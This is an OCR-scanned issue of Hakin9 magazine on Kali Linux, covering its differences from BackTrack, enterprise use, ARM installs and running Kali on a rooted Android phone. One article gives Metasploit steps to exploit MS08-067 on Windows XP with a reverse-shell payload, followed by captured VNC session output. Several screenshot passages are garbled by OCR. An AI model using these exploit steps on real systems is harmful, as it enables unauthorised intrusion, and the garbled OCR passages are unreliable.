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Dear Readers, 

Along with the Autumn here it comes the comprehen- 
sive 'Guide to Kali Linux'. In the following issue we will 
focus on this popular, yet still-much-to-discover pentest- 
ing tool. 

So we will start with the Basics and see what's new 
in Kali Linux comparing to BackTrack and also we will 
browse the set of new and updated tools in the article 'Kali 
Linux for Enterprises'. 

The Attack section is full of great tips for pentesters 
(and not only), so they can see how to weaponize the an- 
droid platform and also perform the attack on servers. 

The Defense section contains a great paper on deploy- 
ing network vulnerability scanners for medical clients and 
presents an interesting view on Kali scanning. There is 
also a fine overview on Kali as a tool for both good and 
bad purposes. 

We are sure you will find a lot of helpful information in 
the whole issue. 



Hakin9's Editorial Team would like to give special 
thanks to the authors, betatesters and proofreaders. 

We hope our effort was worthwhile and you will find the 
Hakin9 Guide to Kali Linux issue appealing to you. We 
wish you a nice read! 



Julia Adamczewska 
and the Hakin9 team 
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com), is also one of the most popular UBUNTU Linux 
based platform, with collection of organized security 
testing tools such as Open-VAS, maltigo, Metasploit 
Framework (MSF), etc. Last release to Backtrack series 
was Backtrack 5 R2 with codename Revolution. 
Kali Linux is the latest linux distribution made for pen- 
etration testing by and used by security assessors and 
hackers. Kali Linux is also considered as a successor 
to Backtrack. 
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smartphone to create an invincible penetration-testing 
weapon. 



Kali Linux, Attacking Servers 



24 



By Ismael Gonzalez D., Security Researcher, CEH, 
MCP, MCDTS, MCSA, LPIC-1 

This article will show you how to perform attacks on web 
servers, getting full access to the system and database. 
Just by using some of the Top Ten' tools of Kali Linux. 

Hands On: How to Create "Backdoor" 
to Remote Access with Kali Linux, 
DNS Spoofing Attack with Ettercap 
and Cloning Sites with Kali Linux 28 

By Rafael Fontes Souza, Co-Founder at Grey Hats, 
member of the "French Backtrack Team" 
The three articles describe very useful tools in Kali and 
cover the ideas of creating backdoor, how to perform 
the spoof attack and how to clone websites with SET 



DEFENSE 

Kali Scanning for HIPPA - A Proof of 
Concept: using Kali Linux to deploy 
distributed network vulnerability 
scanners for medical clients 34 

By Charlie Waters, Security Officer and Senior 
Consultant for Infinity Network Solutions 
The Health Insurance Portability and Accountability 
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dle electronic Protected Health Information (e-PHI) to 
take action and reduce risk relative to potential security 
breaches of digital communication and storage of pa- 
tient information. Open Source solutions can be lever- 
aged as a low-cost and effective strategy to minimize 
risk when used as component of a larger information 
security program. With a long "track" record of commu- 
nity support, Kali is an open source Linux distribution 
containing many security tools to meet the needs of 
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By Deepanshu Khanna, Linux Security Researcher 
Today is the world of technology and everyone some- 
how is attached to it. Some are using the technology for 
the good purpose and some are using it for bad purpos- 
es and Internet is one of those technologies which de- 
fine both my statements. Internet is being used both by 
the good (the White Hats) and the bad (the Black Hats). 
So, my paper is totally based on the above line that the 
OS (Operating System) KALI LINUX (which is an exten- 
sion to Backtrack) can be used in both the ways either 
for good or bad. 
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Kali Linux 
- What's new? 



Kali Linux released earlier in the year is dubbed the most 
advanced penetration testing distribution, ever. How does it 
compare to BackTrack?, and: What's the difference? 



For some years BackTrack linux has been 
the premier pen-test distribution. The new- 
est pen-test distribution released by Of- 
fensive Security which supersedes BackTrack 
comes with some massive and welcome im- 
provements. The biggest change from BackTrack 
is the move from Ubuntu linux to Debian Wheezy 
linux. The first thing I notice is that the installa- 
tion is no longer launched by executing a script 
on the Desktop as it was with BackTrack, but is 
initiated but booting into a proper Debian instal- 
lation system. The process generally feels a lot 
smoother from the start. I have also noticed that 
in general Kali doesn't break as easily as Back- 
track and it generally has a much more stable 
feel to it. So what's the difference between Back- 
Track and Kali? 

BackTrack 5 v Kali 

Ubuntu, which BackTrack is based on, has a gen- 
eral feel to it that it is trying to babysit you as the 
user, which can be annoying to an experienced 
linux user. Ubuntu likes to make everything user 
friendly and tries to cut out any complex configu- 
rations. Debian, which Kali is based on, may not 
come across to be so 'user friendly' to someone 
who is not that experienced with linux, and re- 
quires more hands on experience with linux, but 
is generally more configurable and stable. Person- 



ally, I definitely prefer the Debian base for Kali as I 
like to tweak. This distribution is not for linux begin- 
ners in any case. 

What Happened to Firefox? 

One of the first things I notice is that Firefox has 
been replaced by Iceweasel. On first instance 
this might leave you wondering what Iceweasel is 
and why it has replaced Firefox. The truth is that 
Iceweasel IS Firefox. The Debian project patch- 
es Iceweasel by backporting security fixes, thus 
making it secure enough to be declared in debi- 
an stable version. Because this is the case they 
had to re-brand it Iceweasel as the modifications 
made by Debian project were not approved by the 
Mozilla foundation in order to use the Thunder- 
burd logo. Other than backported security patch- 
es and the logo, both Firefox and Iceweasel are 
identical. I would recommend staying with Ice- 
weasel on Debian, but if you really want to use 
Firefox you can install it in the following manner 
by first uninstalling Iceweasel (Listing 1). 

FHS-compliance and /pentest 

Another massive step in the right direction is FHS- 
compliance. File Hierarchy Standard (FHS) compli- 
ance specifies guiding principles for each part of the 
file system, and means that the directory structure 
and file system is standardised such that software 



Hamn9 



i> 



Extra 03/2013 



Kali Linux - What's new? 



and users can easily find the location of installed 
files such as binaries and libraries. This will also 
lead to a more stable system in general. 

In BackTrack, every pen-test tool which you 
wanted to use you either had to express the full 
pathname to the tool e.g. /pentest/passwords/ 
rainbowcrack/rcrack or change to the directory in 
order to use it. Kali no longer uses the /pentest Ql - 
rectory tree, and all command line pen-test tools 
seem to be located in / usr/bin. Pen-test tools are 



now in PATH and can now be fired up from any- 
where in the system. I certainly don't miss the / 
pentest directory. This certainly makes life a whole 
lot easier. 

No Nessus 

Nessus does not come installed with Kali and is 
not available in the Kali repositories. One reason 
for this could be that Kali linux is based on Debi- 
an Wheezy (Debian 7), however if you check the 
available downloads from the tenable website, 
they have only released a version of Nessus for 
version 6 of Debian. Another reason for this may 
be because Nessus is more of an audit and com- 
pliance benchmarking tool than a pen-test tool, 
and perhaps it was thought too bloated to include. 
Nessus is certainly something I see more of in- 
stalled on dedicated servers these days. Howev- 
er if you want to install it, the Debian 6 version of 
Nessus which can be downloaded from the ten- 
able website will still work. The only other pos- 
sible reason for not including Nessus is that Nes- 
sus is forbidden in the Penetration Testing with 
BackTrack(PWB) Course (which will probably 



Listing 1 . How to install Firefox 

echo "deb http://downloads.sourceforge.net/ 
proj ect/ubuntuzilla/mozilla/apt all main" 
» /etc/apt/sources . list 

apt-get remove iceweasel 

apt-key adv -recv-keys -keyserver 

keyserver.ubuntu.com C1289A29 

apt-get update 

apt-get install firef ox-mozilla-build 
apt-get install thunderbird-mozilla- 
build 
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get a new name now because of Kali). Offensive 
Security encourages all of its PWB students to 
use more specialised and targeted tools to per- 
form enumeration and discovery. Further, differ- 
ent tools quite often output different results, so it's 
best to use more highly targeted tools in a pen- 
test to get specific results rather than the results 
of a generalised scan or vulnerability assessment 
tool such as Nessus. 

Other Notable Changes 

Kali uses Leafpad instead of gedit which is a much 
lighter weight text editor than gedit. It is also no- 
ticeably faster. But if you want to use gedit it is 
still available in the Kali respository with a simple 
apt-get install gedit. Gedit may appear bloated to 
some unless you are interested in syntax highlight- 
ing. Personally I like syntax highlighting, but have 
a habit of writing all my code in vim from the ter- 
minal window which has this functionality anyway 
- each to their own I guess. Here's a list of some 
other welcome changes: 

• The PDF viewer which was used in BackTrack 
has now been replaced with Document Viewer 
which is great since I found the PDF viewer a 
bit flakey. 

• You can now easily create your own custom 
ISO of Kali by using Debian live-build scripts. 

• Kali comes with VLC player pre-installed which 
was not included in BackTrack. 

• I've also noticed that the ISO image for Kali is 
almost 1GB smaller than the BackTrack 5 R3 
ISO. 



On the Web 

• http://www.pathname.com/fhs/ - Information on 
File Hierarchy Standard 

• http://www.offensive-security.com/information-securi- 
ty-training/penetration-testing-with-backtrack/ - Pen- 
etration Testing with Backtrack Course 



Summary 

In summary, Kali linux feels a lot smoother to 
work with than BackTrack, whilst most of the 
tools remain fairly similar or unchanged; the 
main overhaul to be commended on is the over- 
all improvement in the quality of the distribution 
from the move to Debian. It now feels like a com- 
plete distribution with far less flakiness and a lot 
more stability. For a duck dive into the pen-test 
tools which ship with Kali, I would recommend 
doing Offensive Security's Penetration Testing 
with BackTrack(PWB) course which will familiar- 
ise you with all the tools necessary to conducting 
a complete penetration test with reporting. The 
main advantage you will notice is that the tools 
are now all in path with Kali. The only advice I 
have in pursuing this course is to get permission 
from your other half, as it will take a good couple 
of months out of your life, but is extremely fun, ad- 
dictive, and rewarding with all the breakthroughs 
you will have. Well done to the Offensive Security 
Team for creating such an improved distribution, 
and good luck with your Kali experience. 



Upgrading to Future versions of Kali 

If you had BackTrack 4 installed and wanted to up- 
grade to BackTrack 5, the only way you could have 
achieved this was to do an entire reinstall. This 
would be time consuming, and mean you would 
have to re-configure everything back to the way 
you wanted it, and customise all your tools again. 
With Kali however, an upgrade to future major re- 
leases can be done by simply issuing the following 
commands: Listing 2. 

The Kali repository gets its security packages 
from the Debian repository, and all of its tools are 
now packaged up to be Debian compliant. 



Listing 2. Upgrading Kali to the next major distribution 

root@kali:~# apt-get update 
root@kali:~# apt-get dist-upgrade 



STEVEN MCLAUGHLIN 

Steven McLaughlin is an experienced in- 
formation and network security profes- 
sional. With both a technical and consult- 
ing background, he has been heavily in- 
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BASICS 

KALI Linux 
For Enterprises 

Whenever we think of Penetration Testing (PT) the first 
name that comes to our mind is "Backtrack (BT)", which we 
have been using for the last few years. Backtrack, funded 
by offensive Security (www.offensive -Security.com), is also 
one of the most popular UBUNTU Linux based platform, 
with collection of organized security testing tools such 
as Open-VAS, maltigo, Metasploit Framework (MSF), etc 
Last release to Backtrack series was Backtrack 5 R2 with 
codename Revolution. 



Kali Linux is the latest linux distribution made 
for penetration testing by and used by secu- 
rity assessors and hackers. Kali Linux is al- 
so considered as a successor to Backtrack. Back- 
track was based on Ubuntu Distribution (www. 
ubuntu.com) whereas Kali Linux complies with 
debian development standards (www.debian.org). 

Building Kali Linux was something like Re-In- 
venting the wheel again. Kali Linux was built from 
scratch, to support under the Debian platform and 
also to make it compatible with new or existing se- 



Kali Linux Evolutior 



Kali-Linux 



Back Track (BT)-5 Rl & R2 
Codename "Revolution" 



Back Track (BT}-4R2 
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Figure 1. Evolution of Kali Linux 



curity tools. Kali Linux is designed to support both 
32-bit and 64-bit platform and ARM Architecture. 

Evolution of Kali Linux 

When Backtrack was initially developed by Offen- 
sive-Security, with consideration in mind to con- 
duct network based Vulnerability Assessment and 
Penetration testing. They started releasing BT ver- 
sions with their name, as depicted on (Figurel). 
When BT 3 was released, it was released with 
codename "Whydah" and added functionality and 
tools to conduct wireless testing. BT 4 released 
with Codename "Pwnsauce" and "Nemisis", with 
added functionality of web application testing and 
with more advanced and improved GUI based in- 
terface. And with continuation to BT 5 R2 with se- 
curity tools update like BeeF(Browser Explotation 
Frwamework), bluelog, dnschef, dpscan, etc. 

Kali Linux is considered an enterprise ready solu- 
tion, because it considered enterprise users when 
it was designed. Kali runs on a Debian platform, 
which supports many software repositories to keep 
updating OS with latest releases and patch. This 
capability reduces updating problem, which users 
were facing on BT environment. 

Also Offensive security team up with Rapid 7 
(Makers of Metasploit Framework), to provide offi- 
cial support to Kali Linux. So MSF (most important ar- 
senal of BT) was rebuildt to support Debian platform. 
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Development Architecture 

Kali Linux supports various Reduced Instruction 
set Computing (RISC) based development archi- 
tecture. Kali ARM can be made for: 

• EfikaMX 

• Beaglebone Black 

• CuBOX 

• Galaxy Note 10.1 

• Samsung Chromebook 

• MK/SS808 

• ODROIDU2 

• Raspberry Pi 

• ARM Chroot 

Let's discuss here few of them, how these ARM'S 
can be used for Kali Linux. 

EfikaMX 

Efika is a line of power efficient ARM architecture and 
Power architecture. EfiKa MX Open Client is a net- 
work computer based around the EFIKA MX micro- 
mother board. EfikaMX has following specifications: 

• Freescale LMX515 (ARM Cortex-A8 800MHz) 

• 3D Graphics Processing Unit 

• 512 MB RAM 

• 8GB USB 

• 2x USB 2.0 ports 

• Audio jacks for headset 

• Built in Speaker 

• Bluetooth (Broadom 2043) 

Steps to build image by EfikaMX 

• Step 1: Get 8GB micro SD Card, class 10 high- 
ly recommended 

• Step 2: Download Kali image 

• Step 3: use dd utility to image this file to SD card 

root@kali:~ dd if =kali-l . 0 . 1-efimx . img of=/dev/sdb 
bs=512k 

Beaglebone Black 

Beaglebone boards are tiny computers with all ca- 
pability of today's desktop machine without bulk 
noise, expense or noise. 
Steps to build image using Beaglebone: 

• Step 1: Get 8GB micro SD Card, class 10 high- 
ly recommended 

• Step 2: Download Kali Linux Beaglebone 

• Step 3: use dd utility to image this file to SD card 

root@kali:~ dd if =kali-bbb . img of=/dev/sdb bs=512k 



Samsumg Galaxy Note 10.1 

Of course the popular one and most people have 
it. Also attract pentesters to build image for this. 
Kali also listed down its procedure to make image 
for Galaxy note 10.1. Galaxy note 10.1 has follow- 
ing specification: 

• 1.4 GHz Quacore processor 

• 2 GB RAM 

Steps to build image for Samsung Note (Steps as 
per Kali Linux.org website) 

• Step 1: Get 8GB micro SD Card 

• Step 2: Root the Samsung Galaxy Note 10.1 

• Step 3: Download Kali Linux for Samsung gal- 
axy Note 10.1 

• Step 4: Rename the image to linux.img 

• Step 5: Download Recover.img file from down- 
load section of Kali Linux.orf and copy it on 
your Note 10.1 sdcard 

• Step 6: use dd utility to image this file to SD card 

root@kali:~ dd if =/dev/block/mmcblk0p6 
of =recovery . img_orig 

• Step 7: Reboot Galaxy note 10.1 to recovery 
mode, press Power Off and Volume UP button. 
Once you see the text for "Samsung Galaxy 
Note 10.1", release the power button but keep 
pressing the Volume UP button. This should 
boot into Kali and auto Login into Gnome. Root 
Password is "Changeme" 

• Step 8: Open Keyboad: Applications -> Univer- 
sal Access -> Florence Virtual Keyboard 

Note: development architecture referenced from 
http://docs. kali, org/category/armel-armhf. 

Directory Structure 

As Kali is successor to Backtrack, so most of its fea- 
tures are inherited from backtrack. Like Backtrack, 




Figure 2. Directory Structure 
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Kali tools are also divided into 12 categories (Fig- 
ure 2): 

• Information Gathering 

• Vulnerability Analysis 

• Web Applications 

• Password Attacks 

• Wireless Attacks 

• Stress Testing 

• Exploitation Tools 

• Sniffing/Snooping 

• Maintaining Access 




Figure 3. Kali Vs. Backtrack: Change in Directory Structure 




v 

Figure 4. Kali Linux "Top 10 Security Tools" 



• Reverse Engineering 

• Forensics 

• Reporting Tools 

Remembering Backtrack 5, penetration direc- 
tories are organized in under /pentest directory. 
But in Kali Linux doesn't store security tools un- 
der pentest directory, commands are generally ex- 
ecuted from /usr/sbin (Figure 3). 

Another important category of tools added in Kali 
Linux are "TOP 10 Security Tools" which are fre- 
quently used by pentesters, as presented Figure 4. 

Offensive security has also put lots of effort to 
make Kali enterprise ready solution by adding 
more tools in Kali. Researchers most of the time 
used backtrack for "MSF" and to do other stuff, 
they depend on other penetration testing distro's 
or they make their OWN ISO or install on their own 
operating system. (Figure 4) shows the compari- 
son between Backtrack and Kali (Figure 5). 
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Let's do some Practical things with Kali 

As we know the famous vulnerability in Windows- 
XP "MS08-067: Vulnerability in Server Service 
could allow Remote-Code execution" 



to the service not properly handling specially crafted 
RPC requests. An attacker who successfully exploited 
this vulnerability could take complete control of an af- 
fected system. 



Some Brief about the vulnerability 

Remote code execution vulnerability exists in the Serv- 
er service on Windows systems. The vulnerability is due 



Reference to the vulnerability 

http://technet. microsoft, com/en-us/security/bulle- 
tin/ms08-067. 
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Figure 7. Searching exploits fornetapi 



System Exploited successfully 

Windows XP Service PACK-2. 

Steps followed to exploit the vulnerability (Figures 
6-9). Steps explained in a nutshell. 

Step 1: Open MSF Console 

msfconsole 




Figure 8. Setting up exploit, adding required variables, and exploiting the target 



I Aug 16, 1:49 PM 



File 



irrh Terminal Help 



fcXP (Build 26Q0, Survive Pauk 3). 



Ur lk n uwri^funimitr i uT^ftl 
riprerpretef > sysl nfo j 

Ircnliecture : kB6 
>ystem Language : en_US 
taterp ret e r :__x86/w 



[*] Creating ^ ¥NG n^ o Up slager : LHOST-192. 168. 197 . L 
[ * ] Running payloftd handier 
1*1 VNC stager etf«LtabLe bytes Long 

f*] Uploaded the VNC agent rn C:\WTNDnWS\TFMP\.QH.ltarwgy e>re ( 
[*] Executing the VWC agent with endpoint L92 . 160 .197.128: 
neter j jf frier s- Connatled Lu RFB server, using prulutol vers 
in^hl tn.g Tight VNC protocol extensions 



>esktop name "chandra-99Gccba" 
/NC sc 1 vu r da ldu\ l To i md L ; 
3? hits per pixel . 

Least significant byte first in each pixeL . 
True colour: mast red) 255 green 255 blue 255, shift rud L 
Jsing default colormap which is TrueColor. Pixel format: 
32 bits per pixel , 

least significant byte first in each pixel . 

I rue colour: max red 2bb green 2bb blue r 2bb t shift red L 



Figure 9. Verifying exploited system 
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Step 2: Search for exploit "netapi", 

use command "search netapi" 

Step 3: Configure the Exploit for execution to 
target 

Use following commands to exploit target 

• Use exploit/windows/smb/ms08_067_netapi 

• Set payload windows/meterpreter/reverse_tcp 

• Set Ihost <your machine IP> 

• Set rhost <Remote IP> 

• exploit 

Step 4: Exploit run Successfully, Run VNC 

Kali Linux installation and Software 

repositories 

Installation 

• Download VM Player or VMware workstation 
from Vmware website as per yours operating 
system 

• Install on the VMPIayer or VMWare on your 
platform 

• Create Virtual machine (With min 20 GB Hard 
disk Space, 1GB RAM, Two Network Adapter, 
rest all by default) 

• Mount KALI ISO file on the VMWARE setting 

• Switch on the Virtual machine and boot it from 
"CD-ROM" by pressing "ESC" 

• Once GRUB Appear, and then click on the in- 
stall (or it can be used as a LIVE CD) 

• Follow the instruction as written on screen 
(Similar to backtrack installation) 

• Finish the installation 

Update Kali 

• Open leafpad 



• Open file from /etc/apt /sources . list (Some 

sources path already present there, but more 
can be added from Google) 

• apt-get update 

• apt-get upgrade 

• apt-get dist-upgrade 

Summary 

Kali Linux a Debian based platform for advanced 
penetration testing. Kali approach is good try for 
stepping ahead into next generation of penetration 
testing. Researchers and developers of offensive 
security have put their best effort to make Kali plat- 
form enterprise ready. As Debian being the older 
platform for Linux, it also has a large user base 
compared to UBUNTU. Debian based Operating 
system has also good market capture so move- 
ment from Ubuntu to Debian platform will definitely 
give power to end users. 

At last KALI is enterprise focused, developed 
keeping in mind enterprise needs, so there is much 
more to evolve in near future. So good luck to Of- 
fensive Security team! 

Keep Learning and Be Secure! 
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A BZ Media Event 



Big Data gets real 
at Big Data TechCon! 

Discover how to master Big Data from real-world practitioners - instructors 
who work in the trenches and can teach you from real-world experience! 



Come to Big Data TechCon to learn the best ways to: 



• Collect, sort and store massive quantities 
of structured and unstructured data 

• Process real-time data pouring into 
your organization 

• Master Big Data tools and technologies 
like Hadoop, Map/Reduce, NoSQL 
databases, and more 




• Learn HOW TO integrate data-collection 
technologies with analysis and 
business-analysis tools to produce 
the kind of workable information 
and reports your organization needs 

Understand HOW TO leverage Big Data 
to help your organization today 



"Big Data TechCon is loaded with great networking 
opportunities and has a good mix of classes with technical 
depth, as well as overviews. It's a good, technically-focused 
conference for developers." 

— Kim Palko, Principal Product Manager, Red Hat 

"Big Data TechCon is great for beginners as well as 
advanced Big Data practitioners. It's a great conference!" 

— Ryan Wood, Software Systems Analyst, Government of Canada 

"If you're in or about to get into Big Data, this is the 
conference to go to." 

—Jimmy Chung, Manager, Reports Development, Avectra 



BigData 

— TECHCON 




San Francisco 

October 15-17,2013 
www.BigDataTechCon.com 



The HOW-TO conference for Big Data and IT professionals 





Big Data TechCon™ is a trademark of BZ Media LLC. 



ATTACK 

Weaponization of 
Android Platform using 
Kali Linux 

Kali Linux has become the most popular tool for 
professional penetration testing and security auditing. 
In this article, we will review how to couple the 
functionality of Kali Linux with Android platform 
over HTC One X smartphone to create an invincible 
penetration-testing weapon. 





The global market is flooded, ruled by android- 
based mobile devices and smartphones. 
Mobile phones are becoming smaller and 
have greater processing power. These devic- 
es with mobile internet and wireless connectivity 
have revolutionised businesses and work method- 
ologies. Tasks like connectivity, sharing, process 
automation and extensive computing over smart- 
phones have become the norm. The android oper- 
ating system has made smartphones and mobile 
devices, a very powerful tool in the hands of secu- 
rity professionals and even deadlier in the hands 
of black hats. 

Android is a very popular operating system for 
mobile devices such as smartphones and tablets. 
Initially developed by Android Inc. and then bought 
by Google in 2005. Android is an Open Handset 
Alliance product and released under the Apache 
license. The power of Android platform lies in the 
thousands of apps running on it, backed by a strong 
and active open source developer community. Used 
by 70% of the mobile developer community, thus 
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making it the most widely used platform. It is con- 
sidered a highly customisable and scalable mobile- 
based distribution, making it widely accepted foun- 
dation base for community-driven mobile projects. 

Android Architecture Overview 

Android devices, built on Linux kernel version 2.6 
and the first commercially distribution made avail- 
able on HTC Dream handset in 2008. Since then 
numerous updates have incrementally improved 
the operating system base and added new and 
improved functionality. The latest official release 
is Jelly Bean 4.3 with a slogan „An even sweet- 
er Jelly Bean". Android's user interface uses touch 
inputs to correspond to real world actions. These 
responses are immediate, with vibrations and hap- 
tic feedback capabilities. The Android framework is 
very extensive as it has a layered approach. It has 
five layers, the kernel and low-level tools, the na- 
tive libraries, the android runtime with Dalvik virtual 
machine, the framework layer is on top of this and 
finally the applications run above everything. 
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The Linux kernel is written in C/C++ and the 
framework is written in java and runs on Dalvik vir- 
tual machine. The present kernel is 3.0.x and has 
added support for Bluetooth and Wi-Fi encryption. 
Android is built to run on devices with little main 
memory and low powered CPU's. Majority of the 
modules are made to consume low power. The ac- 
tual android runtime consists of Dalvik virtual ma- 
chine and java libraries. All applications in android 
devices run in their own sandboxed Dalvik virtu- 
al machines. Each applications runs with its own 
unique user id and in its own process. Android has 
very efficient memory and power management. 
Android has support for various APIs, has media 
framework, integrated internet browser support, 
highly optimised graphics, camera, GPS, compass, 
and accelerometer sensors. The applications can 
be easily created using SDKs and are available 
using the various apps markets. The biggest ap- 
ps market is Google Play where one can find vari- 
ous apps in categories and using searches. Apart 
from the default Google Play, there are many oth- 
er app stores to download and install apps. Table 
01 provides a list of widely used open markets, but 
make sure not to trust anyone blindly in the present 
scenarios of malicious apps and malware threats. 
Always disable USB debugging and uncheck the 
"Unknown sources" option under Settings » Ap- 



plications menu to keep your android device safe 
from such tampering (Figure and Table 1). 

Table 1. List of available Android App Stores 



Sl# 


Apps Market 


Url 


U 1 


Google Play 


h ttps'J/play. g o ogle, co m/ store?hl=en 


02 


Amazon store 


http://www.amazon.com/mobile- 
apps/oinoue—zjjuiHyui i 


AT 

Ud 


ueuar 


http://www.getjar.mobi/ 


U4 


oiiae ivit 


h ttp:// slideme.org/ 




F-Droid 


h ttps://f-droid. org/ 


UO 


Appoke 


http://beta.appoke.com/ 


U/ 


Appia 


http://appia.com/ 


AO 

Uo 


App Brain 


http://www.appbrain.com/ 




Anaroia hi 


http://www.andi '0 id pit. co m/ 


10 


Handango 


http://www.handango.com/Home. 
jsp?siteld=2218 




Handster 


http://www.handster.com/ 


12 


Mobango 


http://in.mobango.com/ 


13 


Opera Store 


h ttp:/ /apps. opera, com /en _ in/ 


14 


Socio 


http://soc.io/ 


15 


Insyde Market 


http://www.insydemarket.com/ 


16 


AppsFire 


http://appsfire.com/ 


17 


Aptoide 


h ttp://www. ap toide. com/ 




Figure 1. Android Architecture, taken from wiki 
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Introduction to the HTC One X Mobile 
Phone 

The HTC One X smartphone is a pretty power- 
ful device with 1.5 GHz, quad core (global ver- 
sion) CPU speed, Android 4.1 with smart sense 
4, screen size of 1280x720 (HD, 720p) with 1GB 
RAM 16/24 GB Flash Memory and Wi-Fi, Blue- 
tooth, NFC, USB connectivity and multi-sensors 
(Gyro sensor, G-Sensor, Digital Compass, Proxim- 
ity sensor and Ambient light sensor). 

Introduction to Kali Linux 

Offensive Security the creators of Backtrack Linux 
have a new catchy tag line "the quitter you become, 
the more you are able to hear", with this Zen man- 
tra the focus is stealth. Kali Linux was created for 
stealth and attack, this amazing distribution is an 
advanced and more versatile version of Backtrack 
ever created. This distribution is geared towards 
professional penetration testers and security audi- 
tors. Kali has gone beyond any live cd distro and 
moved into the category of a full-fledged operat- 
ing system. It has moved to a solid base of Debi- 
an modules and is completely File Hierarchy Sys- 
tem (FHS) compliant. All directories appear under 
the main root directory 7", and have the ability to 
be stored and accessed on physical or virtual de- 
vices. The main 7pentest" directory from previous 
Backtrack5 release has been removed in this ver- 
sion named Kali. Now the user can execute any tool 
from anywhere in the file-system, irrespective of its 
installed location. The second advantage of Kali is 
its support for ARM hardware and ability to boot- 
strap the installation directly from the repositories. 

Kali operating system has over three hundred 
penetration testing tools and wireless device sup- 
port. Its kernel is highly patched and network 
services are disabled by default making it more 
secure. Kali is not just for network security profes- 
sionals, beginners can also start learning about 
cyber security using this distribution. Whether you 
are pentesting wireless, exposing server vulner- 
abilities, performing a web application based ex- 
ploit, learning, or doing social engineering, Kali is 
the one-stop-shop for all security needs. Kali is 
free and now ported on Android based smartphone 
to be taken anywhere. 

Kali Linux has many well-known tools like 
Metasploit, Injection capable wireless drivers, Kis- 
met, John, Zap Proxy, Nmap, Ophcrack, Ettercap, 
Hydra, etc. These tools are all categorised in fif- 
teen different categories for various purposes. The 
fifteen categories are: Top 10 Security Tools, In- 
formation Gathering, Vulnerability Analysis, Web 
Applications, Password Attacks, Wireless Attacks, 



Exploitation Tools, Sniffing/Spoofing, Maintain- 
ing Access, Reverse Engineering, Stress Testing, 
Hardware Hacking, Forensics, Reporting Tools 
and System Services. Kali Linux is running Debian 
XFCE and comes with vim as default text editor. 
All the standard applications and accessories are 
pre-installed and ready to run. For weaponizing 
Android platform with Kali Linux, we will require an 
unlocked & rooted device. 

How to unlock the HTC One X Bootloader 
and Root the device? 

It is important to understand the difference be- 
tween Unlocking the Bootloader and rooting mo- 
bile devices. Unlocking the Bootloader provides 
the user with the option to change the stock oper- 
ating system on the mobile device. However, root- 
ing is the process of modifying or altering the de- 
fault operating system shipped with the device to 
gain complete control over it. 

This means that the limitations of carriers and 
various manufacturers put on the device is eas- 
ily bypassed, extended functionality is accessed 
without any problems, custom modules and up- 
grades can be added without any limitations. Gen- 
erally, manufacturers and carriers do not usually 



Unlocking Your Bootloader 



Supported DuviLL"j 



HTC is c:<h!nhiIU^] 1o IisUmiiikj 
to users and detrvenrvq 
customer salistaclton. We 
have Meat -J youi voice and 
starling now. wn will allow nur 
ooolloader to be unlocked for 
2011 models going forward 
Please Keep an eye mi lliis website fur inwe details on wfiicn 
dewcra will he. adding Jrils Tcalure Wn are rrtremfily phased 
to see me energy and enthusiasm from our Fans and loyal 
customers., and we are excited lo see whal you are capable of 
HTH i-riijii-i y an1iripntt2i your ninuvHlkHis 

<!is out' reiponuL'ilttY m caution yotf mat not an siatmz 
resulting or oauswi by or from the unlocking of the 
haamactcr may fie etavcrctf under warranty. 

thai unloctong your bootloader does not mean mat you win he 
abie to unlock the SIM lock Unlocking your SIM lock is at the 
discretion of your oueiatur/caiiier and is not part of (lie 
homioaflnr iintorlclnri scope 

Figure 2. Unlock Bootloader 
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devices. 
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Legal Terms 


Unlocfc Bootloader 
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Figure 3. Warranty Void 



18 



Hamn9 



i> 



Extra 03/2013 



Weaponization of Android Platform using Kali Linux 




Figure 4. Linux Deploy 



Q] ¥ AAA 4 

< 4k Properties: Linux 



Install 

Sun GMU/Unui munition 

Reconfigure 

Stftrt lytletn f cconfigurtfiofi 
DEPLOY 



recommend rooting. HTC provides instructions on 
their website to unlock the Bootloader for HTC One 
X, but by performing this operation, the user voids 
all warranty on the device. The systematic instruc- 
tions to unlock the Bootloader for HTC One X are 
present on the HTC Dev site. Make sure HTC Driv- 
ers are installed on the PC and the mobile phone 
can connect and be recognised as HTC Device 
via USB cable. Once the device gets connected 
successfully to the PC, login to the HTCDev web- 
site with the registered user name and password. 
Start by selecting Unlocking Your Bootloader and 
then select "All Other Supported Models" under 
the Supported Devices section, click Begin Unlock 
Bootloader to start the wizard. 

The website prompts to sign a disclaimer that 
clearly states, the warranty is void and proceed- 
ing further would mean that every repair would be 
charged. The website wizard finishes by request- 
ing the device Token ID extracted from the mobile 
phone. Then based on the Token ID, HTC releases 
the unlock code block to release the mobile de- 
vice. The "unlock.bin" file received is, used to flash 
the device and the Bootloader gets unlocked. Next 
step is to install SuperSu app, which is an access 
management tool. Now with root privilege on the 
mobile device, Kali Linux can be installed. There 
are two methods to install Kali Linux on Android: 



4 Install 



NWtaMition of GNU/Linux 



Figure 5. Click Install 
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Figure 6. /nsfa// ffn/s/) 



• Method 01: Install Kali GUI using Linux Deploy 
App, 

• Method 02: Install Kali Command Line Inter- 
face (CLI) using Chroot Environment. 

Method 01 : Install Kali GUI using Linux 
Deploy App 

Requirements: Rooted HTC One X mobile with 4GB 
free space, Linux Deploy App & Android VNC Viewer. 

Methodology 

• Install Linux Deploy and configure 

these values: Distribution=Kali Linux, 
Architecture=armel, VNC: Screen Width=1920, VNC: 
Screen Height=1280, (Figure 4-6) 

• Scroll up click Install to finish the download and 
install of Kali Linux over Wi-Fi, 

• After completion, go back to the Settings and 
select Reconfigure option, 

• Once reconfiguration is complete, run the serv- 
er using the START option, 

• Install Android VNC-Viewer and configure 

these Values: Nickname=Kali, Set Port=5900, 
Password=changeme, Color Options = 4bpp better 

quality video (Figure 7-9). 
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Click on the Connect button to fire away. Ka- 
li Linux GUI will show up. This method effectively 
shows to deploy Kali GUI over Android. 

Optional 01 

Kali distribution can be updated by running the be- 
low command from a terminal prompt: 

sudo apt-get update && sudo apt-get upgrade && 
msf update 



[is. 1«: IS] M**rwr-i#r{-ir?uT-«vd*v ii *lre*dy the n***ft 

[1*14 IS) tt#n*r-i*r«-¥ldt0-fbdt¥ it ilr*«Jy tht mni 
wtf-iton. 

(1«:Jt:1S] o MPfradrd, Q rmmlf imulltf. 0 t« r«vt «nd 0 

npt i^tgrtdrd . 

[IS 14 IV) «M md. C«f>fl«irt 

[ IB: IB 22 J »> begin: ttirt 

[M i*. 22} ttouitlnf pjrtitlom: 

[U JB 22 ) / ... ifcip 

[1* M:22] /proc ... «JUp 

[1I:»:U] /iy* ... tkip 

[1I:M:22] /drv ... skip 

22] /d*v/pt» ... Ulp 

